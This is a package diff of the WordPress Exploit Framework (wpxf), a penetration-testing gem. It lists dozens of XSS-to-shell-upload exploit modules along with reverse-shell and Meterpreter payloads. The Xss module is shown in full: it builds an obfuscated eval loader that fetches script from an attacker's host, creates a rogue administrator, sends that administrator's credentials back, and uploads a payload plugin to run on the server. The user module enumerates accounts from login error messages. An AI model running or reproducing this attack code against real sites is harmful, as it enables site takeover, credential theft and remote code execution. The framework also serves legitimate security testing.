- data/lib/wpxf/modules/exploit/xss/reflected/simple_slideshow_manager_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/slideshow_gallery_reflected_xss_shell_upload.rb +35 -0
- data/lib/wpxf/modules/exploit/xss/reflected/smart_marketing_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/social_buttons_pack_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/social_login_bws_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/social_pug_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/sp_project_document_manager_reflected_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/reflected/spamfree_reflected_xss_shell_upload.rb +44 -0
- data/lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb +49 -0
- data/lib/wpxf/modules/exploit/xss/reflected/splashing_images_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/subscriber_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tidio_gallery_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/timesheet_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tracking_code_manager_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tribulant_newsletter_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/trust_form_reflected_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/twitter_plugin_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/ultimate_csv_importer_reflected_xss_shell_upload.rb +83 -0
- data/lib/wpxf/modules/exploit/xss/reflected/ultimate_form_builder_lite_reflected_xss_shell_upload.rb +30 -0
- data/lib/wpxf/modules/exploit/xss/reflected/updater_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/user_access_manager_reflected_xss_shell_upload.rb +35 -0
- data/lib/wpxf/modules/exploit/xss/reflected/user_login_history_xss_shell_upload.rb +35 -0
- data/lib/wpxf/modules/exploit/xss/reflected/user_role_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/visitors_online_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/w3_total_cache_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wang_guard_reflected_xss_shell_upload.rb +33 -0
- data/lib/wpxf/modules/exploit/xss/reflected/whizz_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wordpress_firewall_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_advanced_importer_reflected_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_filebase_download_manager_reflected_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_live_chat_support_reflected_xss_shell_upload.rb +40 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_mailster_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_members_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_retina_2x_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_statistics_12.0.9_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_statistics_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_v4.4_xss_shell_upload.rb +54 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wpsolr_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/yoast_seo_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/zurl_preview_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb +172 -0
- data/lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb +208 -0
- data/lib/wpxf/modules/exploit/xss/stored/alo_easymail_csrf_xss_shell_upload.rb +48 -0
- data/lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/stored/caldera_forms_stored_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb +83 -0
- data/lib/wpxf/modules/exploit/xss/stored/dw_question_answer_stored_xss_shell_upload.rb +91 -0
- data/lib/wpxf/modules/exploit/xss/stored/dwnldr_xss_shell_upload.rb +58 -0
- data/lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb +57 -0
- data/lib/wpxf/modules/exploit/xss/stored/flickr_rss_csrf_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb +50 -0
- data/lib/wpxf/modules/exploit/xss/stored/gwolle_guestbook_stored_xss_shell_upload.rb +47 -0
- data/lib/wpxf/modules/exploit/xss/stored/imageinject_csrf_xss_shell_upload.rb +53 -0
- data/lib/wpxf/modules/exploit/xss/stored/instagram_feed_csrf_stored_xss_shell_upload.rb +51 -0
- data/lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb +40 -0
- data/lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb +40 -0
- data/lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb +118 -0
- data/lib/wpxf/modules/exploit/xss/stored/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb +43 -0
- data/lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb +80 -0
- data/lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb +60 -0
- data/lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/stored/social_media_widget_csrf_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb +42 -0
- data/lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb +48 -0
- data/lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/stored/universal_analytics_authenticated_xss_shell_upload.rb +90 -0
- data/lib/wpxf/modules/exploit/xss/stored/user_login_log_authenticated_stored_xss_shell_upload.rb +45 -0
- data/lib/wpxf/modules/exploit/xss/stored/woo_custom_checkout_field_xss_shell_upload.rb +44 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_google_maps_stored_xss_shell_upload.rb +55 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb +99 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb +36 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb +55 -0
- data/lib/wpxf/net.rb +16 -0
- data/lib/wpxf/net/cookie_jar.rb +37 -0
- data/lib/wpxf/net/http_client.rb +206 -0
- data/lib/wpxf/net/http_options.rb +98 -0
- data/lib/wpxf/net/http_response.rb +44 -0
- data/lib/wpxf/net/http_server.rb +186 -0
- data/lib/wpxf/net/typhoeus_helper.rb +46 -0
- data/lib/wpxf/net/user_agent.rb +193 -0
- data/lib/wpxf/payloads/bind_php.rb +95 -0
- data/lib/wpxf/payloads/custom.rb +42 -0
- data/lib/wpxf/payloads/download_exec.rb +43 -0
- data/lib/wpxf/payloads/exec.rb +43 -0
- data/lib/wpxf/payloads/meterpreter_bind_tcp.rb +64 -0
- data/lib/wpxf/payloads/meterpreter_reverse_tcp.rb +50 -0
- data/lib/wpxf/payloads/reverse_tcp.rb +152 -0
- data/lib/wpxf/payloads/socket_helper.rb +50 -0
- data/lib/wpxf/utility.rb +12 -0
- data/lib/wpxf/utility/body_builder.rb +151 -0
- data/lib/wpxf/utility/reference_inflater.rb +34 -0
- data/lib/wpxf/utility/text.rb +81 -0
- data/lib/wpxf/versioning.rb +11 -0
- data/lib/wpxf/versioning/browser_versions.rb +56 -0
- data/lib/wpxf/versioning/os_versions.rb +18 -0
- data/lib/wpxf/wordpress.rb +24 -0
- data/lib/wpxf/wordpress/comments.rb +89 -0
- data/lib/wpxf/wordpress/file_download.rb +168 -0
- data/lib/wpxf/wordpress/fingerprint.rb +238 -0
- data/lib/wpxf/wordpress/hash_dump.rb +264 -0
- data/lib/wpxf/wordpress/login.rb +60 -0
- data/lib/wpxf/wordpress/options.rb +27 -0
- data/lib/wpxf/wordpress/plugin.rb +102 -0
- data/lib/wpxf/wordpress/posts.rb +26 -0
- data/lib/wpxf/wordpress/reflected_xss.rb +40 -0
- data/lib/wpxf/wordpress/shell_upload.rb +172 -0
- data/lib/wpxf/wordpress/staged_reflected_xss.rb +82 -0
- data/lib/wpxf/wordpress/stored_xss.rb +73 -0
- data/lib/wpxf/wordpress/urls.rb +131 -0
- data/lib/wpxf/wordpress/user.rb +35 -0
- data/lib/wpxf/wordpress/xss.rb +143 -0
- data/wpxf.gemspec +33 -0
- metadata +708 -0
@@ -0,0 +1,35 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
|
3
|
+
# Provides functionality required to gather information about users.
|
4
|
+
module Wpxf::WordPress::User
|
5
|
+
# Checks if a user exists.
|
6
|
+
# @param user [String] username to check.
|
7
|
+
# @return [Boolean] true if the user exists.
|
8
|
+
def wordpress_user_exists?(user)
|
9
|
+
res = execute_post_request(
|
10
|
+
url: wordpress_url_login,
|
11
|
+
body: wordpress_login_post_body(user, Wpxf::Utility::Text.rand_alpha(6))
|
12
|
+
)
|
13
|
+
|
14
|
+
return true if res && res.code == 200 && (
|
15
|
+
res.body.to_s =~ /Incorrect password/ ||
|
16
|
+
res.body.to_s =~ /document\.getElementById\('user_pass'\)/
|
17
|
+
)
|
18
|
+
|
19
|
+
false
|
20
|
+
end
|
21
|
+
|
22
|
+
# @param cookie [String] a valid session cookie.
|
23
|
+
# @return [Hash, nil] the profile form fields and their default values.
|
24
|
+
def wordpress_user_profile_form_fields(cookie)
|
25
|
+
res = execute_get_request(url: wordpress_url_admin_profile, cookie: cookie)
|
26
|
+
return nil unless res.code == 200
|
27
|
+
|
28
|
+
fields = {}
|
29
|
+
res.body.scan(/<input.*?name="(.*?)".*?value="(.*?)".*?>/i) do |name, value|
|
30
|
+
fields[name] = value
|
31
|
+
end
|
32
|
+
|
33
|
+
fields
|
34
|
+
end
|
35
|
+
end
|
@@ -0,0 +1,143 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
|
3
|
+
require 'erb'
|
4
|
+
|
5
|
+
# Provides helper methods for generating scripts for XSS attacks.
|
6
|
+
module Wpxf::WordPress::Xss
|
7
|
+
include Wpxf
|
8
|
+
include Wpxf::Net::HttpServer
|
9
|
+
include Wpxf::WordPress::Plugin
|
10
|
+
include ERB::Util
|
11
|
+
|
12
|
+
# Initialize a new instance of {Xss}.
|
13
|
+
def initialize
|
14
|
+
super
|
15
|
+
@success = false
|
16
|
+
|
17
|
+
_update_info_without_validation(
|
18
|
+
desc: %(
|
19
|
+
This module stores a script which will be executed when
|
20
|
+
an admin user visits the vulnerable page. Execution of the script
|
21
|
+
will create a new admin user which will be used to upload
|
22
|
+
and execute the selected payload in the context of the
|
23
|
+
web server.
|
24
|
+
)
|
25
|
+
)
|
26
|
+
|
27
|
+
register_options([
|
28
|
+
StringOption.new(
|
29
|
+
name: 'xss_host',
|
30
|
+
desc: 'The address of the host listening for a connection',
|
31
|
+
required: true
|
32
|
+
),
|
33
|
+
StringOption.new(
|
34
|
+
name: 'xss_path',
|
35
|
+
desc: 'The path to access via the cross-site request',
|
36
|
+
default: Utility::Text.rand_alpha(8),
|
37
|
+
required: true
|
38
|
+
)
|
39
|
+
])
|
40
|
+
end
|
41
|
+
|
42
|
+
# @return [String] the address of the host listening for a conneciton.
|
43
|
+
def xss_host
|
44
|
+
normalized_option_value('xss_host')
|
45
|
+
end
|
46
|
+
|
47
|
+
# @return [String] the path to make cross-site requests to.
|
48
|
+
def xss_path
|
49
|
+
normalized_option_value('xss_path')
|
50
|
+
end
|
51
|
+
|
52
|
+
# @return [String] the full URL to make cross-site requests to.
|
53
|
+
def xss_url
|
54
|
+
"http://#{xss_host}:#{http_server_bind_port}/#{xss_path}"
|
55
|
+
end
|
56
|
+
|
57
|
+
# @return [String] a script that includes the user creation JavaScript.
|
58
|
+
def xss_include_script
|
59
|
+
script = [
|
60
|
+
'var a = document.createElement("script");',
|
61
|
+
"a.setAttribute(\"src\", \"#{xss_url}\");",
|
62
|
+
'document.head.appendChild(a);'
|
63
|
+
].join
|
64
|
+
|
65
|
+
"eval(decodeURIComponent(/#{url_encode(script)}/.source))"
|
66
|
+
end
|
67
|
+
|
68
|
+
# @return [String] a script that includes the user creation JavaScript
|
69
|
+
# without any spaces or quotation marks in the script that may be
|
70
|
+
# escaped by the likes of magic-quotes.
|
71
|
+
def xss_ascii_encoded_include_script
|
72
|
+
"eval(String.fromCharCode(#{xss_include_script.bytes.join(',')}))"
|
73
|
+
end
|
74
|
+
|
75
|
+
# @return [String] the URL encoded value of #xss_ascii_encoded_include_script.
|
76
|
+
def xss_url_and_ascii_encoded_include_script
|
77
|
+
url_encode(xss_ascii_encoded_include_script)
|
78
|
+
end
|
79
|
+
|
80
|
+
# @return [String] a script that will create a new admin user and post the
|
81
|
+
# credentials back to {#xss_url}.
|
82
|
+
def wordpress_js_create_user
|
83
|
+
variables = {
|
84
|
+
'$wordpress_url_new_user' => wordpress_url_new_user,
|
85
|
+
'$username' => Utility::Text.rand_alpha(6),
|
86
|
+
'$password' => "#{Utility::Text.rand_alphanumeric(10)}!",
|
87
|
+
'$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
|
88
|
+
'$xss_url' => xss_url
|
89
|
+
}
|
90
|
+
|
91
|
+
create_user_script = Wpxf::DataFile.new('js', 'create_wp_user.js')
|
92
|
+
|
93
|
+
%(
|
94
|
+
#{js_ajax_download}
|
95
|
+
#{js_ajax_post}
|
96
|
+
#{create_user_script.content_with_named_vars(variables)}
|
97
|
+
)
|
98
|
+
end
|
99
|
+
|
100
|
+
# Default HTTP request handler for XSS modules which will serve the script
|
101
|
+
# required to create new administrator users and upload a payload shell.
|
102
|
+
# @param path [String] the path requested.
|
103
|
+
# @param params [Hash] the query string parameters.
|
104
|
+
# @param headers [Hash] the HTTP headers.
|
105
|
+
# @return [String] the response body to send to the client.
|
106
|
+
def on_http_request(path, params, headers)
|
107
|
+
if params['u'] && params['p']
|
108
|
+
emit_success "Created a new administrator user, #{params['u']}:#{params['p']}"
|
109
|
+
store_credentials params['u'], params['p']
|
110
|
+
stop_http_server
|
111
|
+
|
112
|
+
# Set this for #run to pick up to determine success state
|
113
|
+
@success = upload_shell(params['u'], params['p'])
|
114
|
+
|
115
|
+
''
|
116
|
+
else
|
117
|
+
emit_info 'Incoming request received, serving JavaScript...'
|
118
|
+
wordpress_js_create_user
|
119
|
+
end
|
120
|
+
end
|
121
|
+
|
122
|
+
# Upload the selected payload as a WordPress plugin.
|
123
|
+
# @param username [String] the username to authenticate with.
|
124
|
+
# @param password [String] the password to authenticate with.
|
125
|
+
# @return [Boolean] true if successful.
|
126
|
+
def upload_shell(username, password)
|
127
|
+
cookie = authenticate_with_wordpress(username, password)
|
128
|
+
return false unless cookie
|
129
|
+
|
130
|
+
plugin_name = Utility::Text.rand_alpha(10)
|
131
|
+
payload_name = Utility::Text.rand_alpha(10)
|
132
|
+
|
133
|
+
emit_info 'Uploading payload...'
|
134
|
+
res = upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
|
135
|
+
|
136
|
+
!res.nil?
|
137
|
+
end
|
138
|
+
|
139
|
+
# @return [Boolean] true if the XSS shell upload was successful.
|
140
|
+
def xss_shell_success
|
141
|
+
@success
|
142
|
+
end
|
143
|
+
end
|
data/wpxf.gemspec
ADDED
@@ -0,0 +1,33 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
|
3
|
+
Gem::Specification.new do |s|
|
4
|
+
s.name = 'wpxf'
|
5
|
+
s.version = '2.0.0a'
|
6
|
+
s.date = '2018-07-12'
|
7
|
+
s.summary = 'WordPress Exploit Framework'
|
8
|
+
s.description = 'A Ruby framework designed to aid in the penetration testing of WordPress systems'
|
9
|
+
s.authors = ['rastating']
|
10
|
+
s.email = 'rob@rastating.com'
|
11
|
+
s.files = %w[lib db data bin].map { |d| Dir["#{d}/**/*"] }.flatten + ['wpxf.gemspec']
|
12
|
+
s.homepage = 'https://github.com/rastating/wordpress-exploit-framework'
|
13
|
+
s.license = 'GPL-3.0'
|
14
|
+
s.executables << 'wpxf'
|
15
|
+
s.required_ruby_version = '>= 2.4.4'
|
16
|
+
|
17
|
+
s.add_dependency 'colorize', '~> 0.8'
|
18
|
+
s.add_dependency 'mime-types', '~> 3.1'
|
19
|
+
s.add_dependency 'nokogiri', '~> 1.8'
|
20
|
+
s.add_dependency 'rake', '~> 12.3'
|
21
|
+
s.add_dependency 'require_all', '~> 2.0'
|
22
|
+
s.add_dependency 'rubyzip', '~> 1.2'
|
23
|
+
s.add_dependency 'sequel', '~> 5.9'
|
24
|
+
s.add_dependency 'slop', '~> 4.6'
|
25
|
+
s.add_dependency 'sqlite3', '~> 1.3'
|
26
|
+
s.add_dependency 'typhoeus', '~> 1.3'
|
27
|
+
|
28
|
+
s.add_development_dependency 'coveralls', '~> 0.8'
|
29
|
+
s.add_development_dependency 'database_cleaner', '~> 1.7'
|
30
|
+
s.add_development_dependency 'rspec', '~> 3.7'
|
31
|
+
s.add_development_dependency 'rspec_sequel_matchers', '~> 0.5'
|
32
|
+
s.add_development_dependency 'yard', '~> 0.9'
|
33
|
+
end
|
metadata
ADDED
@@ -0,0 +1,708 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: wpxf
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 2.0.0a
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- rastating
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2018-07-12 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: colorize
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - "~>"
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: '0.8'
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - "~>"
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: '0.8'
|
27
|
+
- !ruby/object:Gem::Dependency
|
28
|
+
name: mime-types
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
30
|
+
requirements:
|
31
|
+
- - "~>"
|
32
|
+
- !ruby/object:Gem::Version
|
33
|
+
version: '3.1'
|
34
|
+
type: :runtime
|
35
|
+
prerelease: false
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
37
|
+
requirements:
|
38
|
+
- - "~>"
|
39
|
+
- !ruby/object:Gem::Version
|
40
|
+
version: '3.1'
|
41
|
+
- !ruby/object:Gem::Dependency
|
42
|
+
name: nokogiri
|
43
|
+
requirement: !ruby/object:Gem::Requirement
|
44
|
+
requirements:
|
45
|
+
- - "~>"
|
46
|
+
- !ruby/object:Gem::Version
|
47
|
+
version: '1.8'
|
48
|
+
type: :runtime
|
49
|
+
prerelease: false
|
50
|
+
version_requirements: !ruby/object:Gem::Requirement
|
51
|
+
requirements:
|
52
|
+
- - "~>"
|
53
|
+
- !ruby/object:Gem::Version
|
54
|
+
version: '1.8'
|
55
|
+
- !ruby/object:Gem::Dependency
|
56
|
+
name: rake
|
57
|
+
requirement: !ruby/object:Gem::Requirement
|
58
|
+
requirements:
|
59
|
+
- - "~>"
|
60
|
+
- !ruby/object:Gem::Version
|
61
|
+
version: '12.3'
|
62
|
+
type: :runtime
|
63
|
+
prerelease: false
|
64
|
+
version_requirements: !ruby/object:Gem::Requirement
|
65
|
+
requirements:
|
66
|
+
- - "~>"
|
67
|
+
- !ruby/object:Gem::Version
|
68
|
+
version: '12.3'
|
69
|
+
- !ruby/object:Gem::Dependency
|
70
|
+
name: require_all
|
71
|
+
requirement: !ruby/object:Gem::Requirement
|
72
|
+
requirements:
|
73
|
+
- - "~>"
|
74
|
+
- !ruby/object:Gem::Version
|
75
|
+
version: '2.0'
|
76
|
+
type: :runtime
|
77
|
+
prerelease: false
|
78
|
+
version_requirements: !ruby/object:Gem::Requirement
|
79
|
+
requirements:
|
80
|
+
- - "~>"
|
81
|
+
- !ruby/object:Gem::Version
|
82
|
+
version: '2.0'
|
83
|
+
- !ruby/object:Gem::Dependency
|
84
|
+
name: rubyzip
|
85
|
+
requirement: !ruby/object:Gem::Requirement
|
86
|
+
requirements:
|
87
|
+
- - "~>"
|
88
|
+
- !ruby/object:Gem::Version
|
89
|
+
version: '1.2'
|
90
|
+
type: :runtime
|
91
|
+
prerelease: false
|
92
|
+
version_requirements: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - "~>"
|
95
|
+
- !ruby/object:Gem::Version
|
96
|
+
version: '1.2'
|
97
|
+
- !ruby/object:Gem::Dependency
|
98
|
+
name: sequel
|
99
|
+
requirement: !ruby/object:Gem::Requirement
|
100
|
+
requirements:
|
101
|
+
- - "~>"
|
102
|
+
- !ruby/object:Gem::Version
|
103
|
+
version: '5.9'
|
104
|
+
type: :runtime
|
105
|
+
prerelease: false
|
106
|
+
version_requirements: !ruby/object:Gem::Requirement
|
107
|
+
requirements:
|
108
|
+
- - "~>"
|
109
|
+
- !ruby/object:Gem::Version
|
110
|
+
version: '5.9'
|
111
|
+
- !ruby/object:Gem::Dependency
|
112
|
+
name: slop
|
113
|
+
requirement: !ruby/object:Gem::Requirement
|
114
|
+
requirements:
|
115
|
+
- - "~>"
|
116
|
+
- !ruby/object:Gem::Version
|
117
|
+
version: '4.6'
|
118
|
+
type: :runtime
|
119
|
+
prerelease: false
|
120
|
+
version_requirements: !ruby/object:Gem::Requirement
|
121
|
+
requirements:
|
122
|
+
- - "~>"
|
123
|
+
- !ruby/object:Gem::Version
|
124
|
+
version: '4.6'
|
125
|
+
- !ruby/object:Gem::Dependency
|
126
|
+
name: sqlite3
|
127
|
+
requirement: !ruby/object:Gem::Requirement
|
128
|
+
requirements:
|
129
|
+
- - "~>"
|
130
|
+
- !ruby/object:Gem::Version
|
131
|
+
version: '1.3'
|
132
|
+
type: :runtime
|
133
|
+
prerelease: false
|
134
|
+
version_requirements: !ruby/object:Gem::Requirement
|
135
|
+
requirements:
|
136
|
+
- - "~>"
|
137
|
+
- !ruby/object:Gem::Version
|
138
|
+
version: '1.3'
|
139
|
+
- !ruby/object:Gem::Dependency
|
140
|
+
name: typhoeus
|
141
|
+
requirement: !ruby/object:Gem::Requirement
|
142
|
+
requirements:
|
143
|
+
- - "~>"
|
144
|
+
- !ruby/object:Gem::Version
|
145
|
+
version: '1.3'
|
146
|
+
type: :runtime
|
147
|
+
prerelease: false
|
148
|
+
version_requirements: !ruby/object:Gem::Requirement
|
149
|
+
requirements:
|
150
|
+
- - "~>"
|
151
|
+
- !ruby/object:Gem::Version
|
152
|
+
version: '1.3'
|
153
|
+
- !ruby/object:Gem::Dependency
|
154
|
+
name: coveralls
|
155
|
+
requirement: !ruby/object:Gem::Requirement
|
156
|
+
requirements:
|
157
|
+
- - "~>"
|
158
|
+
- !ruby/object:Gem::Version
|
159
|
+
version: '0.8'
|
160
|
+
type: :development
|
161
|
+
prerelease: false
|
162
|
+
version_requirements: !ruby/object:Gem::Requirement
|
163
|
+
requirements:
|
164
|
+
- - "~>"
|
165
|
+
- !ruby/object:Gem::Version
|
166
|
+
version: '0.8'
|
167
|
+
- !ruby/object:Gem::Dependency
|
168
|
+
name: database_cleaner
|
169
|
+
requirement: !ruby/object:Gem::Requirement
|
170
|
+
requirements:
|
171
|
+
- - "~>"
|
172
|
+
- !ruby/object:Gem::Version
|
173
|
+
version: '1.7'
|
174
|
+
type: :development
|
175
|
+
prerelease: false
|
176
|
+
version_requirements: !ruby/object:Gem::Requirement
|
177
|
+
requirements:
|
178
|
+
- - "~>"
|
179
|
+
- !ruby/object:Gem::Version
|
180
|
+
version: '1.7'
|
181
|
+
- !ruby/object:Gem::Dependency
|
182
|
+
name: rspec
|
183
|
+
requirement: !ruby/object:Gem::Requirement
|
184
|
+
requirements:
|
185
|
+
- - "~>"
|
186
|
+
- !ruby/object:Gem::Version
|
187
|
+
version: '3.7'
|
188
|
+
type: :development
|
189
|
+
prerelease: false
|
190
|
+
version_requirements: !ruby/object:Gem::Requirement
|
191
|
+
requirements:
|
192
|
+
- - "~>"
|
193
|
+
- !ruby/object:Gem::Version
|
194
|
+
version: '3.7'
|
195
|
+
- !ruby/object:Gem::Dependency
|
196
|
+
name: rspec_sequel_matchers
|
197
|
+
requirement: !ruby/object:Gem::Requirement
|
198
|
+
requirements:
|
199
|
+
- - "~>"
|
200
|
+
- !ruby/object:Gem::Version
|
201
|
+
version: '0.5'
|
202
|
+
type: :development
|
203
|
+
prerelease: false
|
204
|
+
version_requirements: !ruby/object:Gem::Requirement
|
205
|
+
requirements:
|
206
|
+
- - "~>"
|
207
|
+
- !ruby/object:Gem::Version
|
208
|
+
version: '0.5'
|
209
|
+
- !ruby/object:Gem::Dependency
|
210
|
+
name: yard
|
211
|
+
requirement: !ruby/object:Gem::Requirement
|
212
|
+
requirements:
|
213
|
+
- - "~>"
|
214
|
+
- !ruby/object:Gem::Version
|
215
|
+
version: '0.9'
|
216
|
+
type: :development
|
217
|
+
prerelease: false
|
218
|
+
version_requirements: !ruby/object:Gem::Requirement
|
219
|
+
requirements:
|
220
|
+
- - "~>"
|
221
|
+
- !ruby/object:Gem::Version
|
222
|
+
version: '0.9'
|
223
|
+
description: A Ruby framework designed to aid in the penetration testing of WordPress
|
224
|
+
systems
|
225
|
+
email: rob@rastating.com
|
226
|
+
executables:
|
227
|
+
- wpxf
|
228
|
+
extensions: []
|
229
|
+
extra_rdoc_files: []
|
230
|
+
files:
|
231
|
+
- bin/wpxf
|
232
|
+
- data/banners/default.txt
|
233
|
+
- data/js/ajax_download.js
|
234
|
+
- data/js/ajax_post.js
|
235
|
+
- data/js/create_wp_user.js
|
236
|
+
- data/js/post.js
|
237
|
+
- data/json/browser_usage_by_frequency.json
|
238
|
+
- data/json/commands.json
|
239
|
+
- data/php/bind_php.php
|
240
|
+
- data/php/download_exec.php
|
241
|
+
- data/php/exec.php
|
242
|
+
- data/php/exec_methods.php
|
243
|
+
- data/php/meterpreter_bind_tcp.php
|
244
|
+
- data/php/meterpreter_bind_tcp_ipv6.php
|
245
|
+
- data/php/meterpreter_reverse_tcp.php
|
246
|
+
- data/php/preamble.php
|
247
|
+
- data/php/reverse_tcp.php
|
248
|
+
- db/config.yml
|
249
|
+
- db/env.rb
|
250
|
+
- db/migrations/001_create_workspaces.rb
|
251
|
+
- db/migrations/002_create_credentials.rb
|
252
|
+
- db/migrations/003_add_credential_type.rb
|
253
|
+
- db/migrations/004_add_unique_workspace_name_index.rb
|
254
|
+
- db/migrations/005_add_logs.rb
|
255
|
+
- db/migrations/006_create_modules.rb
|
256
|
+
- db/migrations/007_create_loot_items.rb
|
257
|
+
- lib/wpxf.rb
|
258
|
+
- lib/wpxf/cli/auto_complete.rb
|
259
|
+
- lib/wpxf/cli/banner.rb
|
260
|
+
- lib/wpxf/cli/console.rb
|
261
|
+
- lib/wpxf/cli/context.rb
|
262
|
+
- lib/wpxf/cli/creds.rb
|
263
|
+
- lib/wpxf/cli/help.rb
|
264
|
+
- lib/wpxf/cli/loaded_module.rb
|
265
|
+
- lib/wpxf/cli/loot.rb
|
266
|
+
- lib/wpxf/cli/module_cache.rb
|
267
|
+
- lib/wpxf/cli/module_info.rb
|
268
|
+
- lib/wpxf/cli/modules.rb
|
269
|
+
- lib/wpxf/cli/options.rb
|
270
|
+
- lib/wpxf/cli/output.rb
|
271
|
+
- lib/wpxf/cli/workspace.rb
|
272
|
+
- lib/wpxf/core.rb
|
273
|
+
- lib/wpxf/core/data_file.rb
|
274
|
+
- lib/wpxf/core/event_emitter.rb
|
275
|
+
- lib/wpxf/core/module.rb
|
276
|
+
- lib/wpxf/core/module_authentication.rb
|
277
|
+
- lib/wpxf/core/module_info.rb
|
278
|
+
